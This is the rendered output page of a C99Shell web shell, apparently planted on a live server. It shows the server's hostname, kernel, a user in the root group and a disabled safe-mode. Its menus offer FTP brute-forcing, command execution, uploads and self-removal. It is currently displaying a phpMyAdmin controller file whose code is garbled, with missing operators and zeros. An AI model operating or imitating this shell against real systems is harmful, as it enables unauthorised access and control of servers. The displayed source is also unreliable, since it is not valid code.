!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/public_html/phpmyadmin/libraries/classes/Controllers/Setup/   drwxr-xr-x
Free 28.72 GB of 117.98 GB (24.34%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ServersController.php (1.94 KB)      -rwxr-x---
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
PhpMyAdmin\Controllers\Setup;

use 
PhpMyAdmin\Config\Forms\Setup\ServersForm;
use 
PhpMyAdmin\Setup\FormProcessing;

use function 
in_array;
use function 
is_numeric;
use function 
is_string;
use function 
ob_get_clean;
use function 
ob_start;

class 
ServersController extends AbstractController
{
    
/**
     * @param array $params Request parameters
     *
     * @return string HTML
     */
    
public function index(array $params): string
    
{
        
$formset = isset($params['formset']) && is_string($params['formset']) ? $params['formset'] : '';
        
$id = isset($params['id']) && is_numeric($params['id']) && (int) $params['id'] >= ? (int) $params['id'] : 0;
        
$mode '';
        if (isset(
$params['mode']) && in_array($params['mode'], ['add''edit''revert'], true)) {
            
$mode $params['mode'];
        }

        
$pages $this->getPages();

        
$hasServer $id >= && $this->config->get('Servers/' $id) !== null;

        if (! 
$hasServer && $mode !== 'revert' && $mode !== 'edit') {
            
$id 0;
        }

        
ob_start();
        
FormProcessing::process(new ServersForm($this->config$id));
        
$page ob_get_clean();

        return 
$this->template->render('setup/servers/index', [
            
'formset' => $formset,
            
'pages' => $pages,
            
'has_server' => $hasServer,
            
'mode' => $mode,
            
'server_id' => $id,
            
'server_dsn' => $this->config->getServerDSN($id),
            
'page' => $page,
        ]);
    }

    
/**
     * @param array $params Request parameters
     */
    
public function destroy(array $params): void
    
{
        
$id = isset($params['id']) && is_numeric($params['id']) && (int) $params['id'] >= ? (int) $params['id'] : 0;

        
$hasServer $id >= && $this->config->get('Servers/' $id) !== null;

        if (! 
$hasServer) {
            return;
        }

        
$this->config->removeServer($id);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0033 ]--